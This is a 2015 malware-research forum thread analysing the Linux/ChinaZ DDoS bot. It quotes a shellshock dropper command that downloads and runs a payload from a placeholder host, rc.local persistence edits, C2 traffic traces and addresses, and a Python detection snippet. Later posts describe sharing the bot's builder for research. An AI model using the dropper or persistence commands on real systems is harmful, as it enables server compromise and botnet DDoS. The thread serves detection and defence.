Linux/ChinaZ.DDoS

Postby unixfreaxjp » Tue Jan 13, 2015 5:31 pm

The ELF's VT is: https://www.virustotal.com/en/file/92fd ... /analysis/
Our initial draft report: https://pastebin.com/raw.php?i=gf4xrB9n
This threat was detected just recently, via shellshock attacks:
Code:
/bin/bash -c \"rm -rf /tmp/*;echo wget http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >>
 /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >>
/tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;
chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget
 http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >>
/tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""

The above request was reported to be generated from the Windows version of the shellshock scanner binary, with the below trace:
VT is: https://www.virustotal.com/en/file/ae67 ... /analysis/ (noted: LOW detection)
Code:
.rdata:0057D808 aBinBashCRmRfTm db '() { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget %s -O /tmp/China'
.rdata:0057D808                                         ; DATA XREF: StartAddress+124o
.rdata:0057D808                 db '.Z-%s >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chm'
.rdata:0057D808                 db 'od 777 /tmp/China.Z-%s >> /tmp/Run.sh;echo /tmp/China.Z-%s >> /tm'
.rdata:0057D808                 db 'p/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Ru'
.rdata:0057D808                 db 'n.sh;/tmp/Run.sh"',0

The ELF payload was served from a hacked Windows system, which served this ELF with the HFS server:
[image attached]

The calls, subs & function names are obfuscated, yet some new, unique, typical characteristics can be spotted as below for detection purposes:
[images attached]

Registration for autostart is done by modifying /etc/rc.local:
Code:
sed -i -e '/exit/d' /etc/rc.local
sed -i -e '2 i//ChinaZ' /etc/rc.local

It hammered SELinux, used hosts.conf, resolv.conf and libnss as the DNS resolver, and the generated backdoor is as per below (noted: not necessarily on a hostname basis).
Code:
SYSCALL5A, send(3, "cM\1\0\0\1\0\0\0\0\0\0\2aa\5gm352\3com\0\0\1\0\1", 30, MSG_NOSIGNAL)
SYSCALL5B, recvfrom(3, "cM\201\200\0\1\0\1\0\5\0\5\2aa\5gm352\3com\0\0\1\0\1\300\f"..., 1024, 0,
           $PARAMS:{sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("202.238.95.24")}, [16])
SYSCALL5C, connect(3, {sa_family=AF_INET, sin_port=htons(9521), sin_addr=inet_addr("121.12.173.173")}, 16)
SYSCALL5D, write(3, "\0\0\0\0Linux2.6.2-4-686-\0\275w\267\0\1\0\0"..., 168) = 168

In this particular sample it calls its CNC at aa.gm352.com (121.12.173.173:9521) at ASN 58543 | 121.12.168.0/21 | CHINATELECOM-HUNAN-H
Code:
$ my_lookup aa.gm352.com
aa.gm352.com.           300     IN      A       121.12.173.173
gm352.com.              3600    IN      NS      ns4.he.net.
gm352.com.              3600    IN      NS      ns3.he.net.
gm352.com.              3600    IN      NS      ns2.he.net.
gm352.com.              3600    IN      NS      ns1.he.net.
gm352.com.              3600    IN      NS      ns5.he.net.
 
$ mycnccheck 121.12.173.173:9521
Connection to 121.12.173.173 9521 port [tcp/*] succeeded!
IPv4   TCP MMD.KickUR.ASS:36555->121.12.173.173:9521 (ESTABLISHED)

[image attached]

Due to the unique new shellshock infection pair (scanner-payload), and the new functions & new signature used, we consider this a new China DDoSer variant: "ChinaZ".
#MalwareMustDie!
*) Threat found by B of MMD ELF Team
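As an added example (not code from the original post or from MMD), detection logic over constructed sample data: it flags web-server log lines carrying the shellshock dropper request quoted above, and checks an /etc/rc.local for the two persistence edits (the line inserted at line 2 and the deleted exit line).

```python
import re

# Indicators taken from the shellshock request and the rc.local commands
# quoted in the post above; everything else here is constructed for the example.
SHELLSHOCK_PREFIX = re.compile(r"\(\)\s*\{\s*:;\s*\};")
CHINAZ_MARKERS = ("/tmp/China.Z-", "echo By China.Z", "/tmp/Run.sh")


def classify_request(line):
    """Return the reasons a web-server log line looks like the ChinaZ
    shellshock dropper; an empty list means nothing matched."""
    reasons = []
    if SHELLSHOCK_PREFIX.search(line):
        reasons.append("shellshock function-definition prefix")
    reasons.extend("ChinaZ dropper string: " + m for m in CHINAZ_MARKERS if m in line)
    return reasons


def check_rc_local(contents):
    """Flag the two rc.local edits from the post: a line containing 'ChinaZ'
    inserted as line 2 (sed '2 i//ChinaZ') and the exit line deleted
    (sed '/exit/d')."""
    lines = contents.splitlines()
    findings = []
    if len(lines) >= 2 and "ChinaZ" in lines[1]:
        findings.append("ChinaZ marker inserted at line 2")
    if not any(l.strip().startswith("exit") for l in lines):
        findings.append("exit line missing (deleted by sed '/exit/d'?)")
    return findings


# Constructed sample inputs (not real captures); the hostname xxxx is the
# placeholder used in the post.
SAMPLE_LOG = [
    '203.0.113.5 - - "GET /cgi-bin/test.cgi HTTP/1.1" 200 '
    '"() { :; }; /bin/bash -c \\"rm -rf /tmp/*;echo wget http://xxxx:81/9521 '
    '-O /tmp/China.Z-gxak >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\\""',
    '203.0.113.9 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
]
INFECTED_RC_LOCAL = "#!/bin/sh -e\n//ChinaZ\n/tmp/China.Z-gxak\n"
CLEAN_RC_LOCAL = "#!/bin/sh -e\n\nexit 0\n"

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify_request(line) or "clean")
    print(check_rc_local(INFECTED_RC_LOCAL), check_rc_local(CLEAN_RC_LOCAL))
```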

Re: Linux/ChinaZ.DDoS

Postby unixfreaxjp » Sat Jan 17, 2015 4:03 pm

New infection on steroids: Linux/ChinaZ.DDoS.
The shellshock drives the infection at the utmost speed. ALERT!!
[image attached]
https://www.virustotal.com/en/file/b337 ... 421439503/
CNC: 121.12.173.173:9521
#MalwareMustDie! ELF Team

Re: Linux/ChinaZ.DDoS

Postby unixfreaxjp » Sat Jan 17, 2015 8:58 pm

The modular version of the ChinaZ in dynamic ELFs (w/shared libs).
Detection ratio is literally ZERO for these modules:
DDoSClient:
https://www.virustotal.com/en/file/b540 ... /analysis/
https://www.virustotal.com/en/file/a86b ... 421490630/
DDosStarter:
https://www.virustotal.com/en/file/daaa ... 421491358/

Analysis is in MMD blog: http://blog.malwaremustdie.org/2015/01/ ... ml#modular
Please credit #malwaremustdie for these findings.

Re: Linux/ChinaZ.DDoS

Postby unixfreaxjp » Sun Jan 18, 2015 7:06 am

I am sorry to write this in the ELF thread, but it is so related to the post in viewtopic.php?f=16&t=3682#p24982
The Windows version of the ChinaZ client attacker was also spotted in a set of ELF samples.
[image attached]
I wrote the summary of my reversing in VT: https://www.virustotal.com/en/file/714e ... /analysis/
#MalwareMustDie!

Re: Linux/ChinaZ.DDoS

Postby ilaloyka » Mon Feb 02, 2015 12:01 pm

I don't get the malware which was shared by you. How do I get the malware? I'm sorry.
Hi, what does `DDosWorksServerEeCodeKey` at 8048194 mean?
Re: Linux/ChinaZ.DDoS

Postby ilaloyka » Fri May 29, 2015 12:10 pm

New ip address is 137.175.13.210:9521

Re: Linux/ChinaZ.DDoS

Postby unixfreaxjp » Sat Jun 20, 2015 2:28 am

New variant of ELF Linux/ChinaZ
[images attached]
VT (4/57): https://www.virustotal.com/en/file/82d3 ... 434758775/
Analysis: http://blog.malwaremustdie.org/2015/06/ ... oaded.html
ELF samples shared in kernelmode.info only - #malwaremustdie

Re: Linux/ChinaZ.DDoS

Postby unixfreaxjp » Wed Jul 01, 2015 1:07 pm

The Linux/ChinaZ.DDoS binary builder for x32/x64 (and Win x32) is shared here to raise the detection ratio of the threat, for research and mitigation purposes.
WARNING! This is not a toy for fun, but a crimeware tool. Using it online w/o good handling can create damage on any service, will violate the law, and can cause your internet service to be blacklisted or, worse, blocked, so the risk is all yours. Please analyze it in your test environment only.

Please read analysis in MalwareMustDie for the more info and the source of the threat: http://blog.malwaremustdie.org/2015/06/ ... es-on.html
VT=NULL: https://www.virustotal.com/en/file/59e6 ... /analysis/
[image attached]

Snapshot:
[image attached]

Builder Interface:
[image attached]

Binary templates:
[image attached]

The binary ELF templates contain ChinaZ GitHub code:
[image attached]

We cannot share the Win32 template (N/A) & CNC tools (forbidden by law; openly sharing them would be beyond the research category, and I could go to jail). Please contact me via PM with your detailed info to record the share. Sorry for the bummer, please bear with the safety procedure. Snapshots of the CNC tool are in the MMD post; VT: https://www.virustotal.com/en/file/8b58 ... /analysis/

#MalwareMustDie's work & share to anti malware community.

Re: Linux/ChinaZ.DDoS

Postby unixfreaxjp » Tue Aug 11, 2015 6:52 am

[images attached]

Re: Linux/ChinaZ.DDoS

Postby unixfreaxjp » Mon Sep 21, 2015 12:02 pm

The ChinaZ "Edition 2.0" (as they call it):
[images attached]

Spotted in an ongoing, busy infection panel:
[image attached]

The sample is only detected by 5 (five) antiviruses 8-)
https://www.virustotal.com/en/file/bae6 ... /analysis/